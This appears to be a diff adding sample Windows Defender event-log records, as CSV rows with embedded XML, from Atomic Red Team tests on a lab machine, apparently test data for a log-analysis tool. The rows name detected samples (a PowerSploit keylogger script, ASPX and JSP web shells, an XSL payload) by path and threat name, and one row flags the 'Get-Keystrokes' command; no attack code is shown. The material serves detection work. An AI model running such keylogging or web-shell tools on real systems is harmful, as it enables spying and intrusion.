+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:51:50.275470Z"">
+    </TimeCreated>
+    <EventRecordID>101</EventRecordID>
+    <Correlation ActivityID=""6E1A750F-42C6-491E-941A-12F6AF57EBD2"">
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""6068"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147725349</Data>
+    <Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">8</Data>
+    <Data Name=""Category Name"">Trojan</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">103</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">2</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">0</Data>
+    <Data Name=""Type Name"">%%822</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">2</Data>
+    <Data Name=""Action Name"">%%809</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x80508023</Data>
+    <Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1117</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:51:50.275470Z"">
+    </TimeCreated>
+    <EventRecordID>101</EventRecordID>
+    <Correlation ActivityID=""6E1A750F-42C6-491E-941A-12F6AF57EBD2"">
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""6068"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147725349</Data>
+    <Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">8</Data>
+    <Data Name=""Category Name"">Trojan</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">103</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">2</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">0</Data>
+    <Data Name=""Type Name"">%%822</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">2</Data>
+    <Data Name=""Action Name"">%%809</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x80508023</Data>
+    <Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User (  ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1116</EventID>
+    <Version>0</Version>
+    <Level>3</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:41:48.236136Z"">
+    </TimeCreated>
+    <EventRecordID>95</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""5500"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:41:40.357Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147726426</Data>
+    <Data Name=""Threat Name"">Trojan:Win32/Sehyioa.A!cl</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">8</Data>
+    <Data Name=""Category Name"">Trojan</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:Win32/Sehyioa.A!cl&amp;threatid=2147726426&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">1</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">1</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">8</Data>
+    <Data Name=""Type Name"">%%862</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">9</Data>
+    <Data Name=""Action Name"">%%887</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User""></Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User (  ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1116</EventID>
+    <Version>0</Version>
+    <Level>3</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:41:17.508276Z"">
+    </TimeCreated>
+    <EventRecordID>76</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""5500"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:18.385Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147683177</Data>
+    <Data Name=""Threat Name"">Backdoor:ASP/Ace.T</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">6</Data>
+    <Data Name=""Category Name"">Backdoor</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Backdoor:ASP/Ace.T&amp;threatid=2147683177&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">1</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">1</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">0</Data>
+    <Data Name=""Type Name"">%%822</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">9</Data>
+    <Data Name=""Action Name"">%%887</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User""></Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User (  ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1116</EventID>
+    <Version>0</Version>
+    <Level>3</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:41:16.418508Z"">
+    </TimeCreated>
+    <EventRecordID>75</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""5500"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147708292</Data>
+    <Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
+    <Data Name=""Severity ID"">4</Data>
+    <Data Name=""Severity Name"">High</Data>
+    <Data Name=""Category ID"">34</Data>
+    <Data Name=""Category Name"">Tool</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">1</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">1</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005)</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">8</Data>
+    <Data Name=""Type Name"">%%862</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">9</Data>
+    <Data Name=""Action Name"">%%887</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User""></Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User (  ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1116</EventID>
+    <Version>0</Version>
+    <Level>3</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:40:16.396422Z"">
+    </TimeCreated>
+    <EventRecordID>48</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""5500"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{8791B1FB-0FE7-412E-B084-524CB5A221F3}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:13.775Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147735426</Data>
+    <Data Name=""Threat Name"">Trojan:XML/Exeselrun.gen!A</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">8</Data>
+    <Data Name=""Category Name"">Trojan</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:XML/Exeselrun.gen!A&amp;threatid=2147735426&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">1</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">1</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">2</Data>
+    <Data Name=""Type Name"">%%823</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">9</Data>
+    <Data Name=""Action Name"">%%887</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User""></Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1116</EventID>
+    <Version>0</Version>
+    <Level>3</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:40:00.730676Z"">
+    </TimeCreated>
+    <EventRecordID>37</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""5500"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147725349</Data>
+    <Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">8</Data>
+    <Data Name=""Category Name"">Trojan</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">1</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">1</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">0</Data>
+    <Data Name=""Type Name"">%%822</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">9</Data>
+    <Data Name=""Action Name"">%%887</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User""></Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User (  ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
+    </Provider>
+    <EventID>1116</EventID>
+    <Version>0</Version>
+    <Level>3</Level>
+    <Task>0</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-18T20:40:00.730676Z"">
+    </TimeCreated>
+    <EventRecordID>37</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""6024"" ThreadID=""5500"">
+    </Execution>
+    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""Product Name"">%%827</Data>
+    <Data Name=""Product Version"">4.18.1906.3</Data>
+    <Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
+    <Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
+    <Data Name=""Unused""></Data>
+    <Data Name=""Unused2""></Data>
+    <Data Name=""Threat ID"">2147725349</Data>
+    <Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
+    <Data Name=""Severity ID"">5</Data>
+    <Data Name=""Severity Name"">Severe</Data>
+    <Data Name=""Category ID"">8</Data>
+    <Data Name=""Category Name"">Trojan</Data>
+    <Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
+    <Data Name=""Status Code"">1</Data>
+    <Data Name=""Status Description""></Data>
+    <Data Name=""State"">1</Data>
+    <Data Name=""Source ID"">3</Data>
+    <Data Name=""Source Name"">%%818</Data>
+    <Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Unused3""></Data>
+    <Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
+    <Data Name=""Origin ID"">1</Data>
+    <Data Name=""Origin Name"">%%845</Data>
+    <Data Name=""Execution ID"">1</Data>
+    <Data Name=""Execution Name"">%%813</Data>
+    <Data Name=""Type ID"">0</Data>
+    <Data Name=""Type Name"">%%822</Data>
+    <Data Name=""Pre Execution Status"">0</Data>
+    <Data Name=""Action ID"">9</Data>
+    <Data Name=""Action Name"">%%887</Data>
+    <Data Name=""Unused4""></Data>
+    <Data Name=""Error Code"">0x00000000</Data>
+    <Data Name=""Error Description"">The operation completed successfully. </Data>
+    <Data Name=""Unused5""></Data>
+    <Data Name=""Post Clean Status"">0</Data>
+    <Data Name=""Additional Actions ID"">0</Data>
+    <Data Name=""Additional Actions String"">No additional actions required</Data>
+    <Data Name=""Remediation User""></Data>
+    <Data Name=""Unused6""></Data>
+    <Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
+    <Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
+  </EventData>
